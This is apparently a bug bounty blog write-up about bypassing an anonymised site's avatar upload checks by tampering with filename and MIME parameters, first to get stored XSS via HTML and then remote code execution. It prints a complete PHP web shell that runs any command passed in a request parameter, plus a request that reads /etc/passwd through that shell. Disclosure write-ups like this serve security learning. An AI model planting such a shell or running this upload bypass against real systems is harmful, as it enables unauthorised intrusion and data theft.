How I found RCE But Got Duplicated

Smile Hacker
Oct 15 · 3 min read

So first of All i can not show You the Name Of the Site Because Of security Issue But Let me tell You How Was I am able to bypass the file Upload functionality to Upload a shell to the website.

So first I tried Into The edit Profile screen I was trying to find An XSS Because XSS pays a lot , But sadly I can not Find any XSS in every Possible parameter So I Think That Lets upload A shell For that I was checking that The Image is Uploading on the same app or any third party app all other images on that website was on https://victimsite.com/images/static/image.jpg so when i uploaded the simple image on the profile it was on https://victimsite.com/images/users/<ProfilID>/smilehacker.jpg

Now the next thing was to try uploading any other extension, but if i try uploading any extension other than JPG, PNG it popup a forbidden error. So its final that there are Restriction of other MIME types.

so I think that i need to try GET request containing the filename & mime, in it https://victimsite.com/settings/<id>/avatar?name=test.png&mime=image%2Fpng

and the response code of the request was 200 OK simple & The next request was PUT request for file upload to the images directory.

https://victimsite.com/users/<id>/testtts.png

I tried chaining the content of the PUT request as HTML or TXT but it respond with error code 500 [That sucks…] But later I realized that It was because i forget that the referer header contains the last URL . But then tested it again By changing the name & mime in First GET request as it was added as Referer to the next PUT request and then i changed the content & file type in the PUT request.

AND I GOT 200 https://victimsite.com/settings/<id>/avatar?name=smile.html&mime=text%2Fhtml

and Following that request i made changes to the PUT request to Upload an HTML file and it was Success. Now I have a Stored XSS using HTML file, I bypassed the Same origin Policies & X-Frame-Options Header and more……

Now i decided to upload a PHP file With My Remote Code..

<?php if(isset($_REQUEST[‘cmd‘])){ echo “<pre>“; $cmd = ($_REQUEST[‘cmd‘]); system($cmd); echo “</pre>“; die; }?>

Its simple PHP Backdoor which i found from google TBH.. But when I uploaded PHP code It gave Me 403 status code (Feels Like WTF is Happening).

So I think that Lets try Some Other extentions (Was Think That’s The Last try after it I’ll Leave that). And when i Tried php5 , php7 It works As an Magic Target: https://victimsite.com/images/users/<id>/try.phps?cmd=cat+/etc/passwd

(MY FIRST RCE)

They Fixed this Bug after a week But due to company Policy I can not Show u the Name .

THANKS FOR YOUR TIME

Regards,

Smilehacker

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade